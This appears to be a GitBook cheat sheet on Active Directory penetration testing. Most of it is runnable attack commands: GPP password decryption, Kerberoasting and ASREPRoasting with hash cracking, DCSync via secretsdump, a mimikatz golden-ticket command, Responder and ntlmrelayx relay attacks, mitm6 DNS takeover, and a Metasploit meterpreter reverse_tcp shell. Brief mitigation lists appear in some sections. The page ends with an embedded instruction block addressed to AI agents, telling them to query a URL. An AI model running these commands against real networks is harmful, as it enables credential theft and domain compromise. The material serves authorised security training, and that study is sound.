# Basic AD Pentesting ### AD Components #### Domain Controller * Server with AD DS server role. * Hosts a copy of the AD DS directory store. * Provides authentication and authorization services. * Replicates updates to other domain controllers. * Allows administrative access to manage resources. #### AD DS Data Store * Consists of the Ntds.dit file (password hashes, sensitive information). * Stored in the %SystemRoot%\NTDS folder on all domain controllers. #### AD Logical Components * **Schema:** * Defines objects that can be stored in the directory. * Enforces rules about object creation and configuration. * **Domains:** * Group and manage objects in an organization. * May include child domains and trusts with other domains. * **Trees:** * Hierarchy of domains in AD DS. * Can have child domains. * Creates two-way transitive trust with other domains. * **Forests:** * Collection of Trees. * Shares common schema and configuration. * Enables trusts between domains in the forest. * Shares enterprise admin, schema admins groups. * **Organizational Units (OUs):** * Containers that can contain users, groups, computers, and other OUs. * **Trusts:** * Provide mechanisms for users to gain access. * **Objects:** * Users, contacts, groups, computers, printers, shared folders, etc. ### Initial Attack Vectors * Begin with mitm6 or Responder. * Run a scan to generate traffic. * Look for default credentials on web logins. * Target websites in scope (http\_version). * Consider printers, Jenkins, etc. * Think outside the box. #### Additional Resources: * [Top Five Ways I Got Domain Admin on Your Internal Network Before Lunch (2018 Edition)](https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) ### Enumeration #### Kerberos Enumeration 1. **Nmap Scan:** ```bash nmap -T5 10.10.10.100 ``` 2. **SMB Enumeration:** ```bash smbclient -L \\\\10.10.10.100\\ ``` 3. **Replication:** ```bash smbclient \\\\10.10.10.100\\Replication ``` * In the `Replication` directory, look for `Groups.xml` file. 4. **Extracting cPassword:** * Copy the `cPassword` attribute from `Groups.xml`. * Use `gpp-decrypt` to decrypt the password: ```bash gpp-decrypt ``` 5. **Psexec.py with Hash:** ```bash psexec.py active.htp /svc_tags:@10.10.10.100 ``` 6. **Kerberoasting with GetUserSPNs.py:** ```bash python3 GetUserSPNs.py limbawy.local/ahmed:Password -dc-ip 192.168.1.10 -request ``` * Save the hash to `TGS.txt`. * Crack the hash using `john`: ```bash sudo john TGS.txt ``` 7. **ASREPRoast with GetNPUsers.py:** ```bash python3 GetNPUsers.py limbawy.local/levi -dc-ip 192.168.1.10 ``` * Save the hash to `TGT.txt`. * Crack the hash using `john`: ```bash sudo john TGT.txt ``` 8. **BloodHound for Full Control:** ```bash bloodhound-python -u Levi -p Password -ns 192.168.1.10 -d limbawy.local -c All ``` 9. **DC Sync Attack with secretsdump.py:** ```bash python3 secretsdump.py limbawy.local/Levi:Password@192.168.1.10 -use-vss ``` 10. **Golden Ticket with mimikatz:** ```bash mimikatz # kerberos:golden /domain:limbawy.local /sid:S-1-5-21-1314916712-2918817657-636196047 /user:Administrator:13dadc78472c366a7cd1cea42347af18 /krbtgt:b3a2e1bb5cb5e94a27f1884d86bca6c2 /ptt ``` #### LMNR * LMNR (Link-Local Multicast Name Resolution) Attack Workflow: 1. Use `responder`: ```bash responder -I tun0 -rdw ``` 2. Wait for events. 3. Retrieve hashes. 4. Crack hashes using `hashcat`: ```bash hashcat -m 5600 hashes.txt rockyou.txt ``` * Defense: * Disable LMNR and NBT-NS. * Enforce strong user passwords. #### SMB 1. **Identify SMB Signing:** ```bash nmap --script=smb2-security-mode.nse -p 445 192.168.57.0/24 ``` 2. **SMB Relay Attack Workflow:** * Edit `responder.conf` to turn off SMB and HTTP. * Run `responder`: ```bash responder -I eth0 -rdw -w ``` * Run `ntlmrelayx.py`: ```bash ntlmrelayx.py -tf targets.txt -smb2support ``` 3. **Gaining a Shell using MSF:** ```bash msfconsole search psexec set rhost target_ip set smbdomain set smpass set payload windows/x64/meterpreter/reverse_tcp set lhost eth0 run ``` 4. **Other Ways to Psexec:** ```bash psexec.py marvel.local/fcastle:password1:@192.168.57.141 smbexec.py marvel.local/fcastle:password1:@192.168.57.141 wmiexec.py marvel.local/fcastle:password1:@192.168.57.141 ``` * **Mitigation:** * Enable SMB Signing. * Disable NTLM authentication. * Implement account tiering. * Restrict local admin access. #### IPv6 Attacks 1. **Install mitm6:** ```bash pip3 install mitm6 ``` 2. **Setup LDAP for DNS Takeover:** * Go to Server Manager. * Add the AD Cert Services feature. 3. **DNS Takeover via mitm6 Workflow:** ```bash mitm6 -d marvel.local ``` 4. **Delegate Impersonation Attack with ntlnrelayx.py:** ```bash ntlmrelayx.py -t ldaps://192.168.57.140 -wh fakewpad.marvel.local -l lootme ``` * [The worst of both worlds: Combining NTLM Relaying and Kerberos delegation](https://dirkjanm.io/the-worst-of-both-worlds-combining-ntlm-relaying-and-kerberos-delegation/) * **Mitigation:** * Disable IPv6. * Disable WPAD. * Enable LDAP signing. * Consider administrative users in the protected users group. #### Passback Attack * [How to Hack Through a Pass-back Attack](https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sallam.gitbook.io/sec-88/network-sec/active-directory/basic-ad-pentesting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.